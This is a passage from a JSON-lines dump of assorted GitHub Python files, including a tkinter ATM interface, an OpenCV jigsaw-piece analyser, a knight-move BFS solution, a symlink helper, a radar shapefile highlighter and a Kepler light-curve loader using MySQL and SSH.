pathlengths.append(p)\nprint('')\nprint(\"average of the shortest paths %s\" % round((sum(pathlengths) / len(pathlengths)), 3))\n\nprint('')\n\nprint(\"density : %s\" % round(nx.density(G), 3))\nprint(\"diameter :\", nx.diameter(G.subgraph(max(nx.connected_components(G), key=len))))\n\n# eccentricity\nlistmineccentricity = (0, 10)\nlistmaxeccentricity = (0, 0)\nfor n in (nx.eccentricity(G.subgraph(max(nx.connected_components(G), key=len)))).items():\n if (listmineccentricity[1] > n[1]):\n listmineccentricity = n\n elif (listmaxeccentricity[1] < n[1]):\n listmaxeccentricity = n\n\nprint('')\nprint(\"The node that has the minimal eccentricity is : \", listmineccentricity)\nprint(\"The node that has the maximum eccentricity is : \", listmaxeccentricity)\nprint('')\n\nprint(\"center : %s\" % nx.center(G.subgraph(max(nx.connected_components(G), key=len))))\nprint(\"periphery : %s\" % nx.periphery(G.subgraph(max(nx.connected_components(G), key=len))))\n\n\n\n# In[ ]:\n\n\nplt.figure(figsize = (15,15))\nnx.draw_random(B, node_size=1500, with_labels=True, node_color=nodecolor)\nnx.draw_networkx_edge_labels(B, pos=nx.circular_layout(B), edge_labels=nx.get_edge_attributes(B, 'weight'))\nplt.title('Weighted graph representing the relationship between the categories', size=20)\nplt.show()\n\n# In[ ]:\n\n\nfrom arcgis.gis import GIS\n","repo_name":"tetherless-world/CodeGraph","sub_path":"kaggle/python_files/sample241.py","file_name":"sample241.py","file_ext":"py","file_size_in_byte":10360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"10997501417","text":"import tkinter as tk\r\n\r\n\r\nwindow=tk.Tk()\r\nwindow.configure(background=\"orange\")\r\nwindow.geometry(\"600x600+400+80\")\r\nwindow.title(\"secure entrance\")\r\nwindow.resizable(width=False, height=False)\r\n\r\ntitle=tk.Label(window,text=\"NL ATM\", fg=\"white\", bg=\"orange\", font=\"Times 30 bold\")\r\ntitle.pack()\r\n\r\n# entryBox = tk.Entry(window)\r\n# entryBox.place(x = 200, y = 50, width=200,height=50)\r\n#\r\n# button_login = tk.Button(window,text=\"Log In\",width=10,height=2, fg=\"orange\",font=(\"Verdana\",\"8\",\"bold\"))\r\n# button_login.pack(pady=60)\r\n\r\nbutton_1=tk.Button(window,text=\"Check Balance\",width=20,height=5, fg=\"orange\",font=(\"Verdana\",\"10\",\"bold\"))\r\nbutton_1.place(x=20,y=100)\r\n\r\nbutton_2=tk.Button(window,text=\"Insert Money\",width=20,height=5,fg=\"orange\",font=(\"Verdana\",\"10\",\"bold\"))\r\nbutton_2.place(x=20,y=250)\r\n\r\nbutton_3=tk.Button(window,text=\"Withdraw Money\",width=20,height=5,fg=\"orange\",font=(\"Verdana\",\"10\",\"bold\"))\r\nbutton_3.place(x=20,y=400)\r\n\r\nbutton_4=tk.Button(window,text=\"Transfer Money\",width=20,height=5,fg=\"orange\",font=(\"Verdana\",\"10\",\"bold\"))\r\nbutton_4.place(x=390,y=100)\r\n\r\nbutton_5=tk.Button(window,text=\"Edit User Information\",width=20,height=5,fg=\"orange\",font=(\"Verdana\",\"10\",\"bold\"))\r\nbutton_5.place(x=390,y=250)\r\n\r\nbutton_6=tk.Button(window,text=\"Log 
out\",width=20,height=5,fg=\"orange\",font=(\"Verdana\",\"10\",\"bold\"))\r\nbutton_6.place(x=390,y=400)\r\n\r\nbutton_7=tk.Button(window,text=\"kerim&erkan@partnership.com\",width=30,height=2,fg=\"orange\",font=(\"Verdana\",\"10\",\"bold\"))\r\nbutton_7.place(x=150,y=550)\r\n\r\nwindow.mainloop()","repo_name":"ErkanA-10NL/Tkinter_Codes","sub_path":"4_Main_Page.py","file_name":"4_Main_Page.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14306260597","text":"import numpy as np\nfrom scipy.signal import find_peaks\nimport matplotlib.pyplot as plt\nimport math\nimport imutils\nimport cv2\n\nfrom edge import Edge\n\n'''\nThe piece class contains all information about puzzle pieces.\nThe image is the image containing the piece in it,\nthe contour is the location of all the points around the edge of the piece\nthe label is a value used to describe the piece\nthe corners, edge objects, and type of the piece are all found.\n\nThe subimage containing the piece, cropped and rotated appropriately can be found with the function\ngetSubimage\n'''\nclass Piece:\n def __init__(self, label, number, image, contour, settings):\n self.label = label # distinct label for piece\n self.number = number # index of piece in the collection's piece list\n self.image = image # image containing the piece\n self.contour = contour # contour along the edge of the piece\n self.findCorners() # find the corner locations for the piece\n self.settings = settings\n self.findEdges() # find the edges of the piece, as Edge objects\n self.getEdgeColors() # find colors for each edge, store in the Edge objects\n self.findType() # side, middle, or corner\n\n '''\n finds a cropped and rotated image for the piece, using the image the piece is in\n can be resized\n also returns the locations of the corners in this subimage\n used to put together the full image using the functions in PuzzleSolution\n '''\n def getSubimage2(self, edge_up, with_details=False, resize_factor=1, draw_edges=[], rel_edge=0, line_width=0):\n image = self.image.copy()\n h, w, _ = image.shape\n\n # used in demo to show edges on the piece\n for edge in range(4):\n if edge in draw_edges and len(draw_edges) == 4:\n cv2.drawContours(image, self.edges[edge].contour, -1, (0,255,0), thickness=10)\n\n cv2.drawContours(image, self.contour, -1, (0,0,0), thickness=line_width)\n\n # find a circle that encloses the piece in the image\n (x,y), r = cv2.minEnclosingCircle(self.contour)\n x = int(x)\n y = int(y)\n r = int(r)\n\n # adjust the circle if it would go over bounds of image\n if y - r < 0:\n y = r\n if x - r < 0:\n x = r\n\n h, w, _ = self.image.shape\n \n lpad = rpad = tpad = bpad = 0\n if y - r < 0:\n tpad = -(y - r)\n if x - r < 0:\n lpad = -(x - r)\n\n # isolate the piece in the image\n mask = np.zeros_like(image)\n cv2.drawContours(mask, [self.contour], -1, (255,255,255), thickness=-1)\n image_piece_isolated = cv2.bitwise_and(mask, image)\n\n # show details if specified\n if with_details:\n for i, corner in enumerate(self.corners):\n prev = self.corners[i-1]\n cv2.circle(image_piece_isolated, (int(corner[1]), int(corner[2])), 10, (0, 255, 255), thickness=-1, lineType=cv2.FILLED)\n cv2.line(image_piece_isolated, (int(corner[1]), int(corner[2])), (int(prev[1]), int(prev[2])), \n (0,255,0), thickness=1)\n\n for i, edge in enumerate(self.edges):\n if edge.label == 'flat':\n color = (255,0,255)\n elif edge.label == 'inner':\n color = (255,0,0)\n else:\n color = 
(0,0,255)\n\n cv2.drawContours(image_piece_isolated, edge.contour, -1, color, thickness=5)\n\n # crop to the circle\n image_crop = image_piece_isolated[max(y-r, 0):min(y+r, h),max(x-r, 0):min(x+r, w)]\n h1, w1, _ = image_crop.shape\n\n padded_image = np.zeros((2*r, 2*r, 3), dtype=np.uint8)\n padded_image[tpad:tpad+h1, lpad:lpad+w1] = image_crop\n\n ph, pw, _ = padded_image.shape\n\n # get the corners on either end of the piece to be displayed on top\n c1 = self.corners[(edge_up + rel_edge) % 4 - 1][1:]\n c2 = self.corners[(edge_up + rel_edge) % 4][1:]\n\n # get the slope of the line to be on top\n delta = c1 - c2\n dx, dy = delta[0], delta[1]\n\n # if the line is vertical, rotate 90 degrees\n if dx == 0:\n angle = 90\n else: # otherwise, rotate arctan (change in y / change in x) degrees\n angle = math.degrees(math.atan(dy / dx))\n\n # if the intended edge will actually be on the bottom\n if( c2[0] < c1[0] or (c2[0] == c1[0] and c2[1] < c1[1])): # need to rotate more!\n angle = angle + 180 # flip 180 degrees\n\n angle -= 90 * rel_edge\n\n final_image = imutils.rotate(padded_image, angle) # rotate the image\n # resize the image\n final_image = cv2.resize(final_image, (int(ph * resize_factor), int(pw * resize_factor)), interpolation=cv2.INTER_AREA)\n \n return final_image, self.getAdjustedCorners(edge_up, (x, y), r, angle, resize_factor)\n\n '''\n finds the location of the corners in the subimage, where the piece is bounded by a circle and \n the image is rotated (angle) degrees. \n '''\n def getAdjustedCorners(self, edge_up, center, radius, angle, resize_factor):\n new_corners = []\n for i in range(edge_up - 1, edge_up + 3):\n index = i % 4\n corner = self.corners[index]\n # for i, corner in enumerate(self.corners):\n x_old = corner[1]\n y_old = corner[2]\n # adjust so pivot is at origin\n x_adj = x_old - center[0]\n y_adj = y_old - center[1]\n # now rotate about origin\n x_new = x_adj*math.cos(math.radians(-angle)) - y_adj*math.sin(math.radians(-angle))\n y_new = y_adj*math.cos(math.radians(-angle)) + x_adj*math.sin(math.radians(-angle))\n # now add the radius so the corner is at the correct position in the subimage\n x_new += radius\n y_new += radius\n new_corners.append((np.array([x_new, y_new]) * resize_factor).astype(int))\n return np.array(new_corners)\n\n '''\n Finds the corner locations on the piece\n '''\n def findCorners(self):\n # dist, prominence to use in finding the peaks\n dist = len(self.contour) // 64\n sharpdist = len(self.contour) // 64 # how far to look on each side to detect sharpness\n prominence = 0\n\n # center the contour\n center = np.mean(self.contour[:,0], axis=0)\n centered_contour = self.contour - center\n \n # convert to polar coordinates and smooth\n rho, phi = cart2pol(centered_contour[:,0,0], centered_contour[:,0,1])\n rho = running_average(rho, 15)\n rho2 = np.concatenate((rho, rho, rho))\n # find peaks in the distance from the center of the piece\n peaks, _ = find_peaks(rho2, distance=dist, prominence=prominence)\n peaks = peaks[peaks >= len(rho)]\n peaks = peaks[peaks < 2*len(rho)]\n peaks -= len(rho)\n \n # find the sharpness of each peak, defined by the change in derivative\n # between neighboring points\n p1s = self.contour[(peaks - sharpdist) % len(self.contour)]\n p2s = self.contour[peaks]\n p3s = self.contour[(peaks + sharpdist) % len(self.contour)]\n\n d1 = p2s - p1s\n d2 = p3s - p2s\n \n delta = d1[:,0] - d2[:,0]\n sharpness = np.linalg.norm(delta, axis=1)\n\n # remove peaks with negative sharpness\n peaks = peaks[np.where(sharpness > 0)]\n 
sharpness = sharpness[np.where(sharpness > 0)]\n \n # reduce the peaks to be just the corners\n peaks = self.pickBestPeaks( peaks, sharpness )\n\n # sort in increasing order based on phi (clockwise)\n order = np.argsort([phi[peaks]])\n peaks = peaks[order][0]\n\n corners = np.zeros((4,3), dtype=int)\n\n # find the coordinates of the corners\n corners_x = self.contour[:,0,0][peaks]\n corners_y = self.contour[:,0,1][peaks]\n \n # store in an array, return\n corners[:len(peaks),0] = peaks\n corners[:len(peaks),1] = corners_x\n corners[:len(peaks),2] = corners_y\n\n self.corners = corners\n\n '''\n takes a list of peaks and returns the peaks estimated to be corners\n uses heuristics of sharpness, area covered, and rectangularness to determine corners\n i.e. corners have high sharpness, high rectangularness, and high area covered\n relative to other subsets of the peaks\n '''\n def pickBestPeaks( self, peaks, sharpness ):\n # crop the image for efficiency\n (x,y), r = cv2.minEnclosingCircle(self.contour)\n r = int(r)\n x = int(x)\n y = int(y)\n img3 = np.zeros((2*r, 2*r), dtype=np.uint8)\n adj_contour = self.contour - [x-r, y-r]\n cv2.drawContours(img3, [adj_contour], -1, 255, thickness=-1)\n maxScore = -1\n maxPeaks = [0, 1, 2, 3]\n\n # normalize sharpness\n sharpness = ((sharpness - np.min(sharpness)) / (np.max(sharpness) - np.min(sharpness)))\n\n # iterate over subsets\n for i in range(len(peaks)):\n peak1 = peaks[i]\n for j in range(i+1, len(peaks)):\n peak2 = peaks[j]\n for k in range(j+1, len(peaks)):\n peak3 = peaks[k]\n for l in range(k+1, len(peaks)):\n peak4 = peaks[l]\n img2 = np.zeros_like(img3)\n point1 = [adj_contour[peak1][0][0], adj_contour[peak1][0][1]]\n point2 = [adj_contour[peak2][0][0], adj_contour[peak2][0][1]]\n point3 = [adj_contour[peak3][0][0], adj_contour[peak3][0][1]]\n point4 = [adj_contour[peak4][0][0], adj_contour[peak4][0][1]]\n\n points = np.array([point1, point2, point3, point4])\n \n # find the area covered by the set of peaks\n cv2.fillPoly(img2, pts=[points], color =255)\n img4 = cv2.bitwise_and(img2, img3)\n\n covered_area = np.sum(img4 == 255)\n\n # find the rectangle that bounds the peaks\n x,y,w,h = cv2.boundingRect(points)\n rect = ((x, y), (w, h), 0)\n box = cv2.boxPoints(rect)\n box = np.intp(box)\n\n # find the area covered by the box, and the area of the points\n area_rect = cv2.contourArea(box)\n area_points = cv2.contourArea(np.array([adj_contour[peak1], adj_contour[peak2], adj_contour[peak3], adj_contour[peak4]]))\n\n # maximum when points form perfect rectangle\n if area_rect > 0:\n score_rect = (area_points / area_rect) ** (1/2)\n else:\n score_rect = 0\n\n # maximum when all points are maximum sharpness\n score_sharp = ((sharpness[i] + sharpness[j] + sharpness[k] + sharpness[l]) - max(sharpness[i], sharpness[j], sharpness[k], sharpness[l]))**(1/4)\n \n # combine metrics\n score = (covered_area)*score_rect*score_sharp\n\n if score > maxScore:\n maxPeaks = [peak1, peak2, peak3, peak4]\n maxScore = score\n\n return np.array(maxPeaks)\n\n '''\n Creates Edge objects based on the corners\n '''\n def findEdges(self):\n # init edges to empty\n edges = []\n\n # for each set of corners next to each other\n for i in range(len(self.corners)):\n # get the corner positions in the contour\n c1_pos = self.corners[i-1][0]\n c2_pos = self.corners[i][0]\n # add a new edge which contains the contour between these two positions\n if c2_pos < c1_pos:\n new_edge = Edge(i, np.concatenate((self.contour[c1_pos:], self.contour[:c2_pos])), self.settings)\n else:\n 
new_edge = Edge(i, self.contour[c1_pos:c2_pos], self.settings)\n if len(edges) > 0:\n prev_edge = edges[-1]\n prev_edge.setRightNeighbor(new_edge)\n new_edge.setLeftNeighbor(prev_edge)\n edges.append(new_edge)\n\n edges[0].setLeftNeighbor(edges[-1])\n edges[-1].setRightNeighbor(edges[0])\n\n self.edges = edges\n\n '''\n Gets the average colors and color histograms along the contour\n where the edge is\n '''\n def getEdgeColors(self):\n # crop for efficiency\n (x,y), r = cv2.minEnclosingCircle(self.contour)\n r = int(r)\n x = int(x)\n y = int(y)\n\n h, w, _ = self.image.shape\n \n lpad = rpad = tpad = bpad = 0\n if y - r < 0:\n tpad = -(y - r)\n if x - r < 0:\n lpad = -(x - r)\n\n # isolate the piece in the image\n mask = np.zeros_like(self.image)\n cv2.drawContours(mask, [self.contour], -1, (255,255,255), thickness=-1)\n image_piece_isolated = cv2.bitwise_and(mask, self.image)\n\n # crop to the circle\n image_crop = image_piece_isolated[max(y-r, 0):min(y+r, h),max(x-r, 0):min(x+r, w)]\n h1, w1, _ = image_crop.shape\n\n padded_image = np.zeros((2*r, 2*r, 3), dtype=np.uint8)\n padded_image[tpad:tpad+h1, lpad:lpad+w1] = cv2.cvtColor(image_crop, cv2.COLOR_BGR2LAB)\n padded_image[:,:,0] = padded_image[:,:,0] // 2\n\n # erode the mask in order to increase accuracy\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (7,7))\n\n adj_contour = self.contour - [x-r+lpad, y-r+tpad]\n piece_mask = np.zeros((2*r, 2*r), dtype=np.uint8)\n\n cv2.drawContours(piece_mask, [adj_contour], -1, 255, thickness=-1)\n piece_mask = cv2.erode(piece_mask, kernel, iterations=1)\n\n # for showing the colors as in the presentation\n piece_mask_show = np.zeros_like(padded_image)\n color_images = []\n\n # iterate over edges\n for i, edge in enumerate(self.edges):\n # adjust the contour to fit within the cropped image\n adj_contour = edge.contour - [x-r+lpad, y-r+tpad]\n edge_mask = np.zeros((2*r, 2*r), dtype=np.uint8)\n img_show = np.zeros((2*r, 2*r, 3), dtype=np.uint8)\n edge_colors = None\n edge_color_hists = []\n\n # find indices to look for a contour in\n hist_mask = np.zeros_like(edge_mask)\n hist_indices = np.linspace(2, edge.points_per_side - 3, max(4, edge.points_per_side // 8)).astype(int)[1:]\n \n starting_points = []\n corresponding_points = []\n # find points to look for color in\n for j in range(0, edge.points_per_side-1):\n if j == edge.points_per_side - 1:\n p1 = adj_contour[j][0]\n p2 = adj_contour[j-1][0]\n dx, dy = p1 - p2\n else:\n p1 = adj_contour[j][0]\n p2 = adj_contour[j+1][0]\n dx, dy = p2 - p1\n\n if dx == 0 and dy == 0:\n if j > 0:\n starting_points.append(starting_points[-1])\n corresponding_points.append(corresponding_points[-1])\n continue\n else:\n dx, dy = adj_contour[j+2][0] - p1\n\n perp_vector = ((1/np.linalg.norm([-dy, dx]))*np.array([-dy, dx]))\n \n starting_points.append((p1 + self.settings[0]*perp_vector).astype(int))\n corresponding_points.append((p1 + (self.settings[1] - self.settings[0])*perp_vector).astype(int))\n\n # iterate over points to look for colors in\n for j in range(2, edge.points_per_side-2):\n p1 = starting_points[j-1]\n p2 = starting_points[j+1]\n p3 = corresponding_points[j-1]\n p4 = corresponding_points[j+1]\n\n # get the color average\n edge_mask_2 = np.zeros((2*r, 2*r), dtype=np.uint8)\n cv2.drawContours(edge_mask_2, [np.array([p1, p3, p4, p2])], -1, 255, thickness=-1)\n\n edge_mask_2 = cv2.bitwise_and(edge_mask_2, piece_mask)\n hist_mask = cv2.bitwise_or(hist_mask, edge_mask_2)\n\n color_avg = cv2.mean(padded_image, mask=edge_mask_2)\n color = 
np.array([color_avg[0], color_avg[1], color_avg[2]])\n\n # # uncomment to make the gif\n # piece_mask_show[edge_mask_2 > 0] = padded_image[edge_mask_2 > 0]\n # cv2.imshow('em2', piece_mask_show)\n # if j % 4 == 0:\n # color_images.append(piece_mask_show.copy())\n # cv2.waitKey(20)\n\n if edge_colors is None:\n edge_colors = color\n else:\n edge_colors = np.vstack((edge_colors, color))\n\n # calculate histogram\n if np.any(hist_indices == j):\n hist = cv2.calcHist([padded_image], [0, 1, 2], hist_mask, [16, 16, 16], [0, 256, 0, 256, 0, 256])\n cv2.normalize(hist, hist, alpha=0, beta=1, norm_type=cv2.NORM_MINMAX)\n edge_color_hists.append(hist)\n\n hist_mask = np.zeros_like(hist_mask)\n\n\n edge.color_arr = edge_colors\n edge.color_hists = edge_color_hists\n\n # # uncomment to save the gif\n # for j in range(64):\n # color_images.append(color_images[-1])\n # cv2.imshow('color_img', color_images[-1])\n # import imageio\n # imageio.mimsave(f'C:/Users/jimmy/Documents/SeniorDesign/PuzzleSolver/piece_gif.gif', color_images)\n # cv2.waitKey(0)\n\n '''\n Saves the type of the piece\n '''\n def findType(self):\n # get the number of flat edges on the piece\n num_flat = 0\n for edge in self.edges:\n if edge.label == 'flat':\n num_flat += 1\n\n # label appropriately\n if num_flat == 0:\n piece_type = 'middle'\n elif num_flat == 1:\n piece_type = 'side'\n else:\n piece_type = 'corner'\n\n self.type = piece_type\n\n# convert from cartesian to polar coordinates, used in findCorners\ndef cart2pol(x, y):\n rho = np.sqrt(x**2 + y**2)\n phi = np.arctan2(y, x)\n return rho, phi\n\n\ndef running_average(x, n):\n from scipy.ndimage.filters import uniform_filter1d\n return uniform_filter1d(x, size=n, mode='wrap')","repo_name":"ColinWoods18/CV-PuzzleSolver","sub_path":"src/piece.py","file_name":"piece.py","file_ext":"py","file_size_in_byte":18774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74405746727","text":"import sys\nfrom collections import deque\ninput = sys.stdin.readline\n\ndx = [-1, -2, -2, -1, 1, 2, 2, 1]\ndy = [2, 1, -1, -2, -2, -1, 1, 2]\n\ndef bfs(a, b, target_x, target_y):\n q = deque([[a, b]])\n\n while q:\n x, y = q.popleft()\n \n if x == target_x and y == target_y:\n return cnt[x][y]\n \n for i in range(8):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0 <= nx < I and 0 <= ny < I and cnt[nx][ny] == 0:\n q.append([nx, ny])\n cnt[nx][ny] = cnt[x][y] + 1\n \nT = int(input())\nfor _ in range(T):\n I = int(input())\n a, b = map(int, input().split())\n target_x, target_y = map(int, input().split())\n cnt = [[0] * I for _ in range(I)]\n print(bfs(a, b, target_x, target_y))","repo_name":"dongdaang/python_algorithm_private_study","sub_path":"백준/DFS와 BFS/나이트의 이동_7562.py","file_name":"나이트의 이동_7562.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70935428649","text":"# -*- coding: utf-8 -*-\nfrom colorama import Fore\nimport os\n\nrank = 1\n\n\ndef handle(output_dir, config):\n for symlink in config:\n print(Fore.WHITE + \"symlink: {} -> {}\".format(symlink[0], symlink[1]) +\n Fore.RESET)\n Symlink(\n src=os.path.join(output_dir, symlink[0]),\n dst=os.path.join(output_dir, symlink[1])).run()\n print(Fore.WHITE + \"done\\n\" + Fore.RESET)\n\n\nclass Symlink:\n def __init__(self, src, dst):\n self.src = os.path.abspath(src)\n self.dst = os.path.abspath(dst)\n\n def run(self):\n if os.path.exists(self.dst):\n return\n\n dir = 
os.path.dirname(self.dst)\n        if not os.path.exists(dir):\n            os.makedirs(dir)\n\n        os.symlink(self.src, self.dst)\n","repo_name":"f-koehler/dotgen","sub_path":"dotgen/plugins/symlinks.py","file_name":"symlinks.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"39605877447","text":"\"\"\"\nThe function takes three lists of the same length as input:\n✔ names, str,\n✔ base pay, int,\n✔ bonus, str giving a percentage such as «10.25%».\n✔ Return a dict with the name as the key and the bonus\namount as the value.\n✔ The amount is computed as the base pay multiplied by the bonus percentage.\n\n\"\"\"\nfrom random import sample, choice\nfrom string import ascii_lowercase\nfrom pprint import pp\n\n\ndef main(table: list[list[str | int]]) -> dict[str, float]:\n    out = dict()\n    for line in table:\n        out[line[0]] = line[1] * round(float(line[2][:-1]) * 0.01, 4)\n    return out\n\n\nif __name__ == '__main__':\n    sample_ = zip(\n        sample(ascii_lowercase, 5),\n        sample(range(10000, 12000, 100), 5),\n        [f\"{choice(range(100))}.{choice(range(100))}%\" for _ in range(5)])\n    sample_ = list(sample_)\n    print(sample_)\n    print()\n    print(main(sample_))\n","repo_name":"am1bestofluck/python_insight","sub_path":"sem4/t5.py","file_name":"t5.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"27817439233","text":"# -*- coding: utf-8 -*-\n# Author: Du puyuan\n\nimport os\nfrom typing import Union, List\n\nimport numpy as np\nimport shapefile\nfrom matplotlib.lines import Line2D\n\nfrom cinrad.constants import MODULE_DIR\nfrom cinrad.error import RadarPlotError\nfrom cinrad._typing import Array_T\n\ndef highlight_area(area:Union[Array_T, str], linecolor:str='red', **kwargs) -> List[Line2D]:\n    r'''Return a list of Line2D objects for the given area name'''\n    fpath = os.path.join(MODULE_DIR, 'shapefile', 'City')\n    shp = shapefile.Reader(fpath)\n    rec = shp.shapeRecords()\n    lines = list()\n    if isinstance(area, str):\n        area = [area]\n    for i in area:\n        if not isinstance(i, str):\n            raise RadarPlotError('Area name should be str')\n        name = np.array([i.record[2].decode('GBK') for i in rec])\n        target = np.array(rec)[(name == i).nonzero()[0]]\n        for j in target:\n            pts = j.shape.points\n            x = [i[0] for i in pts]\n            y = [i[1] for i in pts]\n            lines.append(Line2D(x, y, color=linecolor))\n    return lines","repo_name":"zjuas2016/PyCINRAD","sub_path":"cinrad/visualize/shapepatch.py","file_name":"shapepatch.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"}
{"seq_id":"13791730808","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nQuery the KEBC and load Kepler light curves.\n\"\"\"\n\nfrom __future__ import print_function, division, absolute_import\n\nimport kplr\nimport numpy as np\nimport paramiko\nimport pymysql\nimport socket\n\nfrom . import exceptions\nfrom . 
import utils\nfrom .config import db_params\n\n\ndef select_kics(catalog_file='kebc.csv', period_min=0., period_max=None):\n    \"\"\"\n    Return KIC IDs based on system parameters.\n\n    Parameters\n    ----------\n    catalog_file : string, optional\n        Name of catalog file contained in decatur/data\n    period_min : float, optional\n        Minimum orbital period in days.\n    period_max : float, optional\n        Maximum orbital period in days.\n\n    Returns\n    -------\n    kics : numpy.ndarray\n        KIC IDs matching search criteria.\n\n    Raises\n    ------\n    CatalogMatchError\n        If the query returns no KIC IDs.\n    \"\"\"\n    # Load the catalog DataFrame.\n    df = utils.load_catalog(catalog_file)\n\n    # Construct the query string with minimum period cutoff.\n    query_string = 'period > {}'.format(period_min)\n\n    if period_max is not None:\n        # Add the maximum period cutoff\n        query_string = '{} & period < {}'.format(query_string, period_max)\n\n    # Query the catalog and return KIC IDs.\n    kics = df.query(query_string)['KIC'].values.astype(int)\n\n    if len(kics) == 0:\n        raise exceptions.CatalogMatchError('No EB catalog entries matching criteria.')\n\n    return kics.astype(int)\n\n\ndef __dbconnect(db_name):\n    \"\"\"\n    Log into a database using pymysql. Written by Ethan Kruse.\n\n    Parameters\n    ----------\n    db_name : string\n        Database name\n\n    Returns\n    -------\n    dbconnect : Connect\n        pymysql connection object.\n\n    Raises\n    ------\n    DatabaseSetupError\n        If the environment variables for the database are not defined\n    \"\"\"\n    if None in db_params.values():\n        raise exceptions.DatabaseSetupError('Environment variables for the '\n                                            'database are not defined.')\n\n    return pymysql.connect(host=db_params['host'], user=db_params['user'],\n                           passwd=db_params['password'], db=db_name,\n                           connect_timeout=1)\n\n\ndef loadlc(kic, use_pdc=True, long_cadence=True, from_db=True,\n           db_name='Kepler', fetch=True):\n    \"\"\"\n    Load Kepler data from a local database. Written by Ethan Kruse.\n\n    Parameters\n    ----------\n    kic : int\n        Kepler Input Catalog number for the target.\n    use_pdc : bool, optional\n        Defaults to True. If True, use the PDCSAP data instead of the raw SAP.\n    long_cadence : bool, optional\n        Whether to select long or short cadence. 
Defaults to True, or LC data.\n from_db : bool, optional\n Default loads data from the MySQL database.\n Set to False to load data from MAST using the kplr package.\n db_name : str, optional\n Database name.\n fetch : bool, optional\n If `from_db` == False, set to `fetch == False` to not download data.\n\n Returns\n -------\n times : ndarray\n Kepler times of center of exposure.\n fluxes : ndarray\n Kepler fluxes for each quarter.\n flux_errs : ndarray\n Kepler flux errors for each exposure.\n cadences : ndarray\n Cadence number.\n quarters : ndarray\n Kepler quarter.\n flags : ndarray\n Kepler data quality flags.\n\n Raises\n ------\n NoLightCurvesError\n If there are no light curves for the given KIC ID.\n\n \"\"\"\n if from_db:\n table_name = 'source'\n\n if long_cadence:\n lc_flag = 'LCFLAG > 0'\n else:\n lc_flag = 'LCFLAG = 0'\n\n if use_pdc:\n flux_str = 'pdcsap_flux, pdcsap_flux_err '\n else:\n flux_str = 'sap_flux, sap_flux_err '\n\n host_name = socket.gethostname()\n # Check if local host is on same domain as database host\n if db_params['domain'] in host_name:\n count = 0\n got_it = False\n # Try multiple times in case of sporadic database timeouts\n while count < 5 and not got_it:\n try:\n db = __dbconnect(db_name)\n cursor = db.cursor()\n\n to_ex = 'SELECT cadenceno, quarter, sap_quality, time, {} ' \\\n 'FROM {} WHERE keplerid = %s AND {};'\\\n .format(flux_str, table_name, lc_flag)\n\n cursor.execute(to_ex, (int(kic),))\n results = cursor.fetchall()\n cadences = np.array([x[0] for x in results], dtype=np.int32)\n quarters = np.array([x[1] for x in results], dtype=np.int32)\n flags = np.array([x[2] for x in results], dtype=np.int32)\n times = np.array([x[3] for x in results], dtype=np.float64)\n fluxes = np.array([x[4] for x in results], dtype=np.float32)\n flux_errs = np.array([x[5] for x in results], dtype=np.float32)\n cursor.close()\n db.close()\n\n # For some reason some results are coming back with\n # arrays of length 0.\n if len(times) > 0:\n got_it = True\n\n count += 1\n except pymysql.OperationalError:\n print('mysqldb connection failed on attempt {0} of {1}.\\n'\n 'Trying again.'.format(count + 1, 5))\n count += 1\n else:\n # Run query through an SSH tunnel\n query_str = \"'SELECT cadenceno, quarter, sap_quality, time, {0} \" \\\n \"FROM {3} \" \\\n \"WHERE keplerid = {2} AND {1};'\".format(flux_str, lc_flag, int(kic), table_name)\n\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(db_params['tunnel_host'], username=db_params['tunnel_user'])\n\n command_str = 'mysql -h {} -u {} -D {} --password={} -e {}'\\\n .format(db_params['host'], db_params['user'], db_name,\n db_params['password'], query_str)\n\n stdin, stdout, stderr = ssh.exec_command(command_str)\n results = stdout.read().splitlines()\n results = results[1:]\n\n cadences = np.array([int(x.split('\\t')[0]) for x in results],\n dtype=np.int32)\n quarters = np.array([int(x.split('\\t')[1]) for x in results],\n dtype=np.int32)\n flags = np.array([int(x.split('\\t')[2]) for x in results],\n dtype=np.int32)\n times = np.array([float(x.split('\\t')[3]) for x in results],\n dtype=np.float64)\n fluxes = np.array([float(x.split('\\t')[4]) for x in results],\n dtype=np.float32)\n flux_errs = np.array([float(x.split('\\t')[5]) for x in results],\n dtype=np.float32)\n ssh.close()\n\n else:\n client = kplr.API()\n\n light_curves = client.light_curves(kepler_id=kic, fetch=fetch,\n short_cadence=(not long_cadence))\n\n times, fluxes, flux_errs = [], [], []\n flags, 
cadences, quarters = [], [], []\n\n for lc in light_curves:\n with lc.open() as ff:\n hdu_data = ff[1].data\n\n times = np.append(times, hdu_data[\"time\"])\n flags = np.append(flags, hdu_data[\"sap_quality\"])\n cadences = np.append(cadences, hdu_data[\"cadenceno\"])\n\n quarter = np.repeat(int(ff[0].header['quarter']),\n len(hdu_data))\n quarters = np.append(quarters, quarter)\n\n if use_pdc:\n fluxes = np.append(fluxes, hdu_data[\"pdcsap_flux\"])\n flux_errs = np.append(flux_errs,\n hdu_data[\"pdcsap_flux_err\"])\n else:\n fluxes = np.append(fluxes, hdu_data[\"sap_flux\"])\n flux_errs = np.append(flux_errs, hdu_data[\"sap_flux_err\"])\n\n # Remove NaNs\n good_data = np.isfinite(fluxes)\n times = times[good_data]\n fluxes = fluxes[good_data]\n flux_errs = flux_errs[good_data]\n flags = flags[good_data]\n cadences = cadences[good_data]\n quarters = quarters[good_data]\n\n if len(times) == 0:\n raise exceptions.NoLightCurvesError('No light curves found for KIC {}'.format(kic))\n\n # Guarantee the light 